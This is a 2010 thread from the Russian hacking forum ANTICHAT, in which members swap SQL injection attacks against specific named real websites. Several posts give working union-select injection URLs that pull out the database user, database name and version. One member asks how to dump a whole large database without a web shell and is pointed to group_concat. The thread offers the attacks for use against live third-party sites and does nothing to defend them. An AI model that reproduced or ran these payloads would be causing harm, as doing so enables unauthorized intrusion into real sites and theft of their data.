HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12031  
Старый 16.03.2010, 19:02
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Seravin  
1) это дело привычки
2)
Код:
http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
(долго это искал чтоб показать)
Цитата:
http://kip.medaar.ru/prod.php?idsub=999+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
На - реагирует
 
Ответить с цитированием

  #12032  
Старый 16.03.2010, 19:04
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами: 9122965

Репутация: 36
По умолчанию

подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
 
Ответить с цитированием

  #12033  
Старый 16.03.2010, 19:07
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от -=ASSKAKO=-  
подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
не очень удобно это как??
 
Ответить с цитированием

  #12034  
Старый 16.03.2010, 19:12
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами: 9122965

Репутация: 36
По умолчанию

таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
 
Ответить с цитированием

  #12035  
Старый 16.03.2010, 19:14
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от -=ASSKAKO=-  
таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
А group_concat использовать пробовал?
 
Ответить с цитированием

  #12036  
Старый 16.03.2010, 19:16
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами: 9122965

Репутация: 36
По умолчанию

нет,если б знал как правильно составить запрос((
Цитата:
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
точно второе...
пошел РТФМ
 
Ответить с цитированием

  #12037  
Старый 16.03.2010, 19:18
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
http://www.ecominfo.spb.ru/about/print.php?id=1211+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
Скажите, а это уже слепая?
 
Ответить с цитированием

  #12038  
Старый 16.03.2010, 19:22
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите, а это уже слепая?
Цитата:
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),database(),version()),15,16,17 ,18,19,20,21,22,23,24,25,26+--+
:'(
 
Ответить с цитированием

  #12039  
Старый 16.03.2010, 19:22
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

Код:
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+%20--+
а чо бы ей быть слепой?вывод есть!
 
Ответить с цитированием

  #12040  
Старый 16.03.2010, 19:24
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите, а это уже слепая?
Слепота в каком месте???
Код:
http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26+--+
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.